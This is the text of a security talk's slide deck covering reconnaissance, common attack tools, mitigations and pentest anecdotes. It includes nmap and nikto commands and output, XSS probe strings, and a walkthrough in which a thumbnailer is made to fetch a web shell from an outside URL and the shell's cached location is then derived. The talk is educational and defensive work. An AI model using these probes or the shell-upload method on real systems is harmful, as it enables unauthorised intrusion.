hacking
Some odds, ends and anecdotes
Who am I
No-one of consequence
15 years as a dev
Banking, insurance, VOIP, crypto,
games, simulation, F-111 control,
mission planning, accounting,
high volume websites, and more
Switched this year to infosec
Agenda
The basics of Hacking
Tools of the Trade
Mitigation
Stories from the front line
The basics
What is it?
Enumeration
Enumeration
Enumeration
Information gathering
OS + version
Web Server + version + modules
Application + version + plugins
Application layout/structure
Application logic
URI mappings
Authentication mechanism
API endpoints
Transport level security measures
What does it give you?
Weak points
Increased chance of successful attack
Targeted research
Known flaws / vulns
Attacking
95% Enumeration
5% execution
Often known flaws
Custom exploits
Most common:
LFI/RFI
Poor Auth
SQLi
ATTACKERS
Know way more than you think
Can find out way more than you think
Are more creative than you think
Will find a way in if they want it bad enough
Without it
Bad guys have almost nothing
Blind attacks are possible but hard
They'll give up earlier
Everything is insecure
Be a less appealing target
Don't store sensitive user info
Don't leak infra info
Patch regularly
Security is ongoing, not once-off
TOOLS!
Nmap
The scanner of scanners
Fingerprints OS
Open ports
Some vulns
NMAP OUTPUT
sudo nmap -A -O 10.5.26.52
Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-31 15:19 EST
Nmap scan report for WIN-P73NLAJOYFH.fritz.box (10.5.26.52)
Host is up (0.00062s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:49:AE:13 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NMAP OUTPUT
Host script results:
|_nbstat: NetBIOS name: WIN-P73NLAJOYFH, NetBIOS user: , NetBIOS MAC: 00:0c:29:49:ae:13 (VMware)
| smb-os-discovery:
| OS: Windows Vista (TM) Ultimate 6002 Service Pack 2 (Windows Vista (TM) Ultimate 6.0)
| OS CPE: cpe:/o:microsoft:windows_vista::sp2
| Computer name: WIN-P73NLAJOYFH
| NetBIOS computer name: WIN-P73NLAJOYFH
| Workgroup: WORKGROUP
|_ System time: 2013-10-31T16:20:48+11:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms WIN-P73NLAJOYFH.fritz.box (10.5.26.52)
NMAP OUTPUT
Probe for SMB vulns on Vista SP2
nmap -p 445 10.5.26.52 --script=smb-check-vulns --script-args=unsafe=1
CRASHES!
NMAP OUTPUT
Probe for SMB vulns on XP Home
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE <-- OOOOH!
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds
Instant SYSTEM shell
Still a REALLY common OS
NMAP ALSO GETS
Servers
- HTTP
- Telnet
- FTP
- SSH
- ...and many more
SQLMAP
DB ownage via SQLi
Automates the lot
Dumps:
- Data
- Schema
- Accounts
- Passwords!
Nikto.pl
Perl script for application scanning
- Common web application problems
- Unprotected folders
- Misconfiguration
- Information disclosure
- Known vulnerabilities
NIKTO.PL OUTPUT
$ ./nikto.pl -h http://SUPERSECRET -Display 124
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: XX.XX.XX.XX
+ Target Hostname: SUPERSECRET
+ Target Port: 80
+ Start Time: 2013-10-31 15:35:01 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /securecontrolpanel/ - Redirects (301) to https://ANOTHERSITE:2083 , Web Server Control Panel
+ /webmail/ - Redirects (301) to http://SUPERSECRET:2095 , Web based mail package installed.
+ /mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> - Redirects (301) to http://ANOTHERSITE/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT> , Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo/ - Redirects (301) to http://ANOTHERSITE/mailman/listinfo/%3cscript%3ealert('Vulnerable')%3c/script%3e , Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /mailman/admin/ml-name?\">; - Redirects (301) to http://ANOTHERSITE/mailman/admin/ml-name?\">; , Mailman is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /mailman/listinfo - Redirects (301) to http://ANOTHERSITE/mailman/listinfo , Mailman was found on the server.
+ /cpanel/ - Redirects (301) to http://SUPERSECRET:2082 , Web-based control panel
+ /cgi-sys/cgiecho - Redirects (302) to http://SOMEOTHERSITE/wwwdev/cgiemail/nopath.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /cgi-sys/cgiemail - Redirects (302) to http://SOMEOTHERSITE/wwwdev/cgiemail/nopath.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /cgi-sys/domainredirect.cgi - Redirects (302) to http://ANOTHERSITE/domainnotknown.html , Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ /css - Redirects (301) to http://SUPERSECRET/css/ , This might be interesting...
+ /download/ - Redirects (302) to /?error=You%20submitted%20an%20empty%20url , This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
+ /js - Redirects (301) to http://SUPERSECRET/js/ , This might be interesting...
+ OSVDB-3092: /scr/: This might be interesting.
DIRBUSTER
Dir brute forcer
Surprisingly handy!
Uncovers folders that are otherwise hidden
AKA entry points
HYDRA
Account brute-forcer
- SSH
- FTP
- TELNET
- IMAP/POP
- SMTP
DO. NOT. REUSE. PASSWORDS. PERIOD.
HASHCAT
GPU Password cracking
AMAZINGLY fast
MD5 | md5($pass.$salt) | md5($salt.$pass) | md5(unicode($pass).$salt) | md5($salt.unicode($pass)) | SHA1 | sha1($pass.$salt) | sha1($salt.$pass) | sha1(unicode($pass).$salt) | sha1($salt.unicode($pass)) | MySQL | phpass, MD5(Wordpress), MD5(phpBB3) | md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 | MD4 | NTLM | Domain Cached Credentials, mscash | SHA256 | sha256($pass.$salt) | sha256($salt.$pass) | sha256(unicode($pass).$salt) | sha256($salt.unicode($pass)) | descrypt, DES(Unix), Traditional DES | md5apr1, MD5(APR), Apache MD5 | SHA512 | sha512($pass.$salt) | sha512($salt.$pass) | sha512(unicode($pass).$salt) | sha512($salt.unicode($pass)) | sha512crypt, SHA512(Unix) | Domain Cached Credentials2, mscash2 | Cisco-PIX MD5 | WPA/WPA2 | Double MD5 | LM | Oracle 7-10g, DES(Oracle) | bcrypt, Blowfish(OpenBSD) | SHA-3(Keccak) | Half MD5 (left, mid, right) | Password Safe SHA-256 | IKE-PSK MD5 | IKE-PSK SHA1 | NetNTLMv1-VANILLA / NetNTLMv1+ESS | NetNTLMv2 | Cisco-IOS SHA256 | Samsung Android Password/PIN | RipeMD160 | Whirlpool | TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 + AES | TrueCrypt 5.0+ PBKDF2 HMAC-SHA512 + AES | TrueCrypt 5.0+ PBKDF2 HMAC-Whirlpool + AES | TrueCrypt 5.0+ PBKDF2 HMAC-RipeMD160 boot-mode + AES | AIX {smd5} | AIX {ssha256} | AIX {ssha512} | 1Password | AIX {ssha1} | Lastpass | GOST R 34.11-94 | OSX v10.8 | GRUB 2 | sha256crypt, SHA256(Unix) | Joomla | osCommerce, xt:Commerce | nsldap, SHA-1(Base64), Netscape LDAP SHA | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | Oracle 11g | SMF > v1.1 | OSX v10.4, v10.5, v10.6 | MSSQL(2000) | MSSQL(2005) | EPiServer 6.x < v4 | EPiServer 6.x > v4 | SSHA-512(Base64), LDAP {SSHA512} | OSX v10.7 | vBulletin < v3.8.5 | vBulletin > v3.8.5 | IPB2+, MyBB1.2+
BURP
Similar to ZAP, but more awesome
Proxy, intruder, spider, scanner,
repeater, sequencer, decoder, comparer ...
Perfect MITM tool
The web app attacker's best friend
Chrome & Firefox
But not IE ;)
Chrome dev tools
Firebug
Insane visibility out of the box
Don't use hackbar, it's crap
METASPLOIT
The pentester's go-to tool
Hundreds of exploits, hundreds of post-exploits
Priv esc, pivots, persistence, automatic ownage,
info gathering, desktop automation, computer lockout,
credential snarfing, pass-the-hash,
DNS/NETBIOS/LLMNR spoofing
and WAY more
meterpreter
The preferred shell for use with Metasploit
Makes post-exploitation on Windows a dream
Fear this thing
Disclaimer: I work on this
Metasploit & Meterpreter
DEMO!
ALL THESE TOOLS
Are free ...
... many are open source ...
... all of them easy to use
in case it's not clear
DO. NOT. REUSE. PASSWORDS. PERIOD.
Don't store sensitive data
Don't encrypt; hash
DO. NOT. REUSE. PASSWORDS. PERIOD.
You are already behind in the game of cat and mouse
Mitigation
Remove server headers
Remove framework versions
Hide apps (e.g. behind a reverse proxy such as Nginx)
Use HTTPS
Parameterised queries
MITIGATION
Avoid NIH
Log your stuff
WATCH your logs
Firewall OUTBOUND as well as inbound
Turn off EVERYTHING you don't need
MITIGATION
DO NOT trust user input
DO NOT trust database "input"
Don't run commands in your app
Don't use blacklists
Don't sanitize, reject!
MITIGATION
Patch your servers
Patch your frameworks
Monitor your users
Don't store sensitive data
If you must store it, don't roll your own crypto
MITIGATION
If you can, use third-parties for auth
(eg. Facebook, Google, Twitter)
Use whatever tools you can to mitigate the common
issues including XSS, CSRF, DOR, etc
Stand on the shoulders of giants
Be critical of your own work
and get it reviewed
FRONT LINE STORY 1
PHP Web Application
First ever pentest
SQLi on front page
XSS everywhere
Profile image upload feature
RCE in 12 mins!
FRONT LINE STORY 2
Bounty for charity
No reward, goal was to help out
Built on a commercial CMS
Still had a very interesting hole
FRONT LINE STORY 2
Server disclosed IIS 7.5
Windows box, probably running ASP.NET
http://domain/index.aspx
Definitely running ASP.NET
Already narrowed down possible attack vectors
FRONT LINE STORY 2
Commercial CMS out of scope
custom code in scope
Typical brochure site
not much functionality
ASP.NET 2.0, no XSS, CSRF or SQLi
However....
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx
?file=image.jpg&w=200&h=200
Not part of the core CMS
Obvious custom code
Appeared to do image resizing on the fly
FRONT LINE STORY 2
Questions:
What would I do if I were to write this?
Would I cache images?
Would I resize each time?
What .NET functions would I use?
How would I handle missing files?
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx?file=SCHMOOPY.png
File doesn't exist
Crash
Stack trace
Information disclosure
FRONT LINE STORY 2
Now we know:
- Images need to be on disk
- Images are most likely cached
- Stack traces can be helpful
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx
?file=http://site/foo.png
It renders!
But... the file needs to be on disk?
What does this mean?
We can upload files
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx?
file=http://site/bar.txt
Crashes in the image manipulation function
No file type sanitisation
What other extensions might be interesting?
FRONT LINE STORY 2
http://domain.com/Thumbnailer.ashx?
file=http://site/shell.aspx
Same crash
We just uploaded our own shell
But where is it?
FRONT LINE STORY 2
How do we find out where the files
are cached?
What do we know about the
target OS that can help?
"con" (a reserved Windows device name)
FRONT LINE STORY 2
http://domain/Thumbnailer.ashx?
file=/foo/con
Crash
Stack trace
Can't stat file /imagecache/-4372839843.io/con
We've found the cache
FRONT LINE STORY 2
More playing with `file`
Files stored as
/imagecache/<hash>.extension
Our shell is located at
/imagecache/<hash>.aspx
But what's the hash?
FRONT LINE STORY 2
.NET has a function..
.GetHashCode()
We generate the hash for our file
We now know the location of the shell
http://domain/imagecache/28949548.aspx
Owned
FRONT LINE STORY 2
Priv esc was out of scope :(
Lessons?
- Don't disclose info.
- Turn off debug errors.
- Sanitise file extensions.
- Don't allow external files.
- Do not trust your users.
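What the lessons above look like as code, written here as an added example rather than the thumbnailer from the talk: the `file` parameter is rejected (not cleaned up) when it is a URL, an absolute or traversing path, a non-image extension, or a Windows device name such as `con`, and the cache name comes from a keyed hash plus the validated extension instead of `.GetHashCode()`. The image root, the secret key and the extension allowlist are assumptions for the example.

```python
import hmac
import hashlib
from pathlib import Path
from urllib.parse import urlsplit

# Added example, not code from the talk. Every path and key here is an assumption.
IMAGE_ROOT = Path("/var/www/images")             # assumed on-disk image folder
CACHE_KEY = b"assumed-server-side-secret"         # assumed, kept out of source in real life
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # the only types the resizer serves
# Windows device names: a bare "con" is what exposed the cache path in the story,
# and "con.jpg" is still the CON device on Windows, so check the stem too.
RESERVED = ({"con", "prn", "aux", "nul"}
            | {f"com{i}" for i in range(1, 10)} | {f"lpt{i}" for i in range(1, 10)})


class RejectedFile(ValueError):
    """Any value we refuse to fetch; the handler answers 400 with no stack trace."""


def resolve_image(param: str) -> Path:
    """Map a user-supplied `file` value to a path under IMAGE_ROOT, or reject it."""
    if not param or "\x00" in param or "\\" in param:
        raise RejectedFile("empty, NUL byte or backslash")
    if urlsplit(param).scheme:                            # http://, file://, c:/ ...
        raise RejectedFile("remote or drive-qualified location")
    parts = param.split("/")
    if parts[0] == "" or ".." in parts:                    # "/foo/con", "../../x"
        raise RejectedFile("absolute or traversal path")
    rel = Path(param)
    if rel.suffix.lower() not in ALLOWED_EXT:              # shell.aspx, bar.txt ...
        raise RejectedFile("extension not in allowlist")
    if rel.name.split(".")[0].lower() in RESERVED:
        raise RejectedFile("reserved device name")
    root = IMAGE_ROOT.resolve()
    full = (root / rel).resolve()
    if root not in full.parents:                          # belt and braces
        raise RejectedFile("escapes image root")
    return full


def cache_name(param: str) -> str:
    """Cache file name: keyed SHA-256 of the relative path plus the validated extension."""
    full = resolve_image(param)
    rel = full.relative_to(IMAGE_ROOT.resolve()).as_posix().encode()
    return hmac.new(CACHE_KEY, rel, hashlib.sha256).hexdigest() + full.suffix.lower()


def verdict(param: str) -> str:
    """'ok' or the rejection reason; useful for logging which inputs get refused."""
    try:
        resolve_image(param)
        return "ok"
    except RejectedFile as why:
        return f"rejected: {why}"
```

Run `verdict()` over the story's inputs (`http://site/shell.aspx`, `/foo/con`, `bar.txt`) and each one is refused before any fetch or resize happens.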
CLOSING THOUGHTS
Security can't be bolted on.
It's a process, not a patch.
Include it in your sprints and reviews.
Take it seriously, or it'll own you.
QUESTIONS?
thank you
OJ Reeves
@TheColonial
http://buffered.io/
oj@buffered.io
Ping me!
Hacking - some odds, ends and anecdotes
By OJ
Basics of hacking, tools, mitigations and stories.